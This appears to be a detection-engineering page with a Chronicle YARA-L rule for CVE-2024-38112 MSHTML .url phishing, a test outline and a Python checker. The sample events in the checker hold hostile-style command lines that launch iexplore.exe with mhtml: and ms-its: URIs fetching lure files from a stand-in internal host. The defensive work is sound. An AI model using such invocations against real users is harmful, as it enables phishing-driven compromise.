Detect CVE-2024-38112 - Windows MSHTML Spoofing via .url File Phishing (Void Banshee) in Google Chronicle
Detects exploitation of CVE-2024-38112, a Windows MSHTML spoofing vulnerability actively exploited by the Void Banshee threat group. Attackers deliver crafted .url files that invoke the legacy Internet Explorer MSHTML engine (mhtml: or ms-its: URI handlers) to load remote malicious content, bypassing modern browser security controls. Patch released July 2024; in CISA KEV catalog.
YARA-L Detection Query
rule cve_2024_38112_mshtml_url_spoofing {
  meta:
    author = "df00tech Detection Engineering"
    description = "Detects CVE-2024-38112 exploitation: iexplore.exe launched with mhtml/ms-its URI handlers from document or browser parents"
    severity = "CRITICAL"
    priority = "HIGH"
    reference = "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112"

  events:
    // Child process is Internet Explorer (predicates in this section are implicitly ANDed)
    $proc.metadata.event_type = "PROCESS_LAUNCH"
    $proc.target.process.file.full_path = /(?i)iexplore\.exe$/

    // Command line carries one of the legacy MSHTML / ITS URI schemes
    (
      $proc.target.process.command_line = /(?i)mhtml:/ or
      $proc.target.process.command_line = /(?i)ms-its:/ or
      $proc.target.process.command_line = /(?i)mk:@MSITStore/ or
      $proc.target.process.command_line = /(?i)its:\/\//
    )

    // Parent is a mail client, Office application, shell or modern browser
    $proc.principal.process.file.full_path = /(?i)(outlook|winword|excel|powerpnt|explorer|msedge|chrome|firefox)\.exe$/

  condition:
    $proc
}

Chronicle YARA-L rule detecting Internet Explorer processes with legacy MSHTML URI scheme arguments spawned by mail or browser processes, covering the CVE-2024-38112 Void Banshee exploitation pattern.
False Positives & Tuning
- Legacy enterprise line-of-business applications that use iexplore.exe with mhtml: for report rendering
- IT help systems using CHM files (ms-its: protocol) launched from Office applications
- Security red team exercises in environments where IE is still present and targeted
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Simulate CVE-2024-38112: mhtml URI via crafted .url file
Expected signal: Sysmon EventID 11 for .url file creation in %TEMP%; Sysmon EventID 1 for explorer.exe launching iexplore.exe with mhtml: in the command line; Sysmon EventID 3 for iexplore.exe attempting outbound connection to 192.168.100.200:80
- Test 2: Simulate CVE-2024-38112: ms-its URI handler via .url file
Expected signal: Sysmon EventID 1 for iexplore.exe or hh.exe with ms-its: in CommandLine; Sysmon EventID 3 for outbound HTTP to 192.168.100.200; Sysmon EventID 11 for .url file creation
- Test 3: Simulate Void Banshee delivery chain: Outlook attachment drop and .url execution
Expected signal: Sysmon EventID 11 for .url file in Outlook INetCache path; Sysmon EventID 1 for cmd.exe parent and iexplore.exe child with mhtml: CommandLine; Sysmon EventID 3 for iexplore.exe outbound connection attempt; Windows Security EventID 4688 for process creation chain
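To check the rule's predicates offline against the expected signals of the three tests, here is an added Python re-implementation (not part of the original page or of Chronicle) run over constructed process-launch records; field names, paths and URIs are assumptions, and it also shows where the tests expect telemetry (hh.exe child, cmd.exe parent) that the rule as written does not match.

```python
import re

# The three predicates of the YARA-L rule above, re-expressed as Python regexes.
CHILD_RE = re.compile(r"iexplore\.exe$", re.IGNORECASE)
URI_RE = re.compile(r"mhtml:|ms-its:|mk:@MSITStore|its://", re.IGNORECASE)
PARENT_RE = re.compile(
    r"(outlook|winword|excel|powerpnt|explorer|msedge|chrome|firefox)\.exe$",
    re.IGNORECASE,
)


def matches_rule(event: dict) -> bool:
    """True when one PROCESS_LAUNCH event satisfies the child, URI and parent predicates."""
    if event.get("event_type") != "PROCESS_LAUNCH":
        return False
    return bool(
        CHILD_RE.search(event.get("target_path", ""))
        and URI_RE.search(event.get("command_line", ""))
        and PARENT_RE.search(event.get("parent_path", ""))
    )


def launch(tag, parent, target, cmdline):
    """Build a constructed PROCESS_LAUNCH record (field names are assumptions, not UDM)."""
    return {"tag": tag, "event_type": "PROCESS_LAUNCH",
            "parent_path": parent, "target_path": target, "command_line": cmdline}


IE = r"C:\Program Files\Internet Explorer\iexplore.exe"

# Constructed samples modelled on the page's three tests plus a benign control.
SAMPLE_EVENTS = [
    launch("t1_explorer_mhtml", r"C:\Windows\explorer.exe", IE,
           f'"{IE}" mhtml:http://192.168.100.200/lure.mht'),
    launch("t2_outlook_ms_its", r"C:\Program Files\Microsoft Office\OUTLOOK.EXE", IE,
           f'"{IE}" ms-its:http://192.168.100.200/lure.chm::/index.htm'),
    # Test 2 also expects hh.exe; the rule keys only on iexplore.exe, so this is a gap.
    launch("t2_hh_ms_its", r"C:\Windows\explorer.exe", r"C:\Windows\hh.exe",
           r"C:\Windows\hh.exe ms-its:http://192.168.100.200/lure.chm::/index.htm"),
    # Test 3 expects a cmd.exe parent, which the parent regex does not list.
    launch("t3_cmd_parent", r"C:\Windows\System32\cmd.exe", IE,
           f'"{IE}" mhtml:http://192.168.100.200/lure.mht'),
    launch("benign_https", r"C:\Windows\explorer.exe", IE,
           f'"{IE}" https://intranet.example/reports'),
]


def evaluate(events):
    """Return the tags of events the rule would alert on, in input order."""
    return [e["tag"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS))  # ['t1_explorer_mhtml', 't2_outlook_ms_its']
```

Widening CHILD_RE to hh.exe and PARENT_RE to cmd.exe would cover Tests 2 and 3 fully, at the cost of more CHM help-system noise of the kind listed under False Positives.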